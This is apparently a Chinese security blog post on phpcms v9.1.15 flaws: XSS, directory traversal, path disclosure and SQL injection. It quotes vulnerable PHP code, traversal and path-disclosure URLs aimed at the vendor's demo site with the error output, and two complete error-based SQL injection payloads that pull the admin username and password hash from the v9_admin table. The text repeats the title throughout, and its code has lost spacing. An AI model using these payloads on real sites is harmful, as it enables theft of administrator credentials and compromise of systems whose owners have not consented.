我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 漏洞信息phpcms v9.1.15 sql及XSS漏洞利用
phpcms v9.1.15 sql及XSS漏洞利用
4425
0推荐
0评论

phpcms v9.1.15  官方演示站已更新到 9.1.16:http://v9.demo.phpcms.cn/

phpcms v9.1.15 sql 及 XSS 漏洞利用

XSS

phpcms v9.1.15 sql 及 XSS 漏洞利用

publicfunction public_get_suggest_keyword(){               $url = $_GET['url'].'&q='.$_GET['q'];               echo $url;                            $res =@file_get_contents($url);if(CHARSET !='gbk'){                      $res = iconv('gbk', CHARSET, $res);}               echo $res;}

利用方法:

phpcms v9.1.15 sql 及 XSS 漏洞利用

http://localhost/phpcms/index.php?m=search&a=public_get_suggest_keyword&url=http://localhost/&q=1

phpcms v9.1.15 sql 及 XSS 漏洞利用

新建一个名为&q=1的文件 写入

phpcms v9.1.15 sql 及 XSS 漏洞利用

黑名单过滤:这里只说过滤方式. 这里并没有权限访问

phpcms v9.1.15 sql 及 XSS 漏洞利用

if(!$this->admin_username)returnfalse;if($_GET['args']) extract(getswfinit($_GET['args']));    $dir = isset($_GET['dir'])&& trim($_GET['dir'])? str_replace(array('..\','../','./','.\','..'),'', trim($_GET['dir'])):'';    $filepath = $this->upload_path.$dir;    $list = glob($filepath.'/'.'*');if(!empty($list)) rsort($list);    $local = str_replace(array(PC_PATH, PHPCMS_PATH ,DIRECTORY_SEPARATOR.DIRECTORY_SEPARATOR), array('','',DIRECTORY_SEPARATOR), $filepath);    $url =($dir =='.'|| $dir=='')? $this->upload_url : $this->upload_url.str_replace('.','', $dir).'/';    $show_header =true;    include $this->admin_tpl('album_dir');

http://localhost/phpcms/index.php?m=attachment&a=album_dir&dir=.. 用黑名单过滤始终是不可取的

phpcms v9.1.15 sql 及 XSS 漏洞利用

路径泄露

phpcms v9.1.15 sql 及 XSS 漏洞利用

if(empty($filename)) $filename = ROUTE_C;if(empty($m)) $m = ROUTE_M;     $filepath = PC_PATH.'modules'.DIRECTORY_SEPARATOR.$m.DIRECTORY_SEPARATOR.$filename.'.php';if(file_exists($filepath)){            $classname = $filename;            include $filepath;if($mypath = pc_base::my_path($filepath)){                   $classname ='MY_'.$filename;                   include $mypath;}returnnew $classname;

没进行容错处理提交:

phpcms v9.1.15 sql 及 XSS 漏洞利用

http://v9.demo.phpcms.cn/index.php?m=../model&c=member_group_model.class

phpcms v9.1.15 sql 及 XSS 漏洞利用

由于member_group_model.class 类不存在 会报错

phpcms v9.1.15 sql 及 XSS 漏洞利用

Fatal error: Class 'member_group_model.class' not found in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/classes/application.class.php on

phpcms v9.1.15 sql 及 XSS 漏洞利用

http://v9.demo.phpcms.cn/index.php?m=../../

phpcms v9.1.15 sql 及 XSS 漏洞利用

Fatal error: Cannot redeclare timeinterval() (previously declared in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php:15) in /workspace/wwwroot/v9.demo.phpcms.cn/phpcms/libs/functions/autoload/info.func.php on line 27

phpcms v9.1.15 sql 及 XSS 漏洞利用

SQL注入:

phpcms v9.1.15 sql 及 XSS 漏洞利用

phpcms v9.1.15 多处 sql 及 XSS 缺陷

phpcms v9.1.15 sql 及 XSS 漏洞利用

http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1

phpcms v9.1.15 sql 及 XSS 漏洞利用

phpcms v9.1.15 多处 sql 及 XSS 缺陷

phpcms v9.1.15 sql 及 XSS 漏洞利用

http://localhost/phpcms/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.password+as+char))),0x27,0x7e)+from+`phpcmsv9`.v9_admin+Order+by+userid+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'%3D'1

phpcms v9.1.15 sql 及 XSS 漏洞利用

phpcms v9.1.15 多处 sql 及 XSS 缺陷


已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415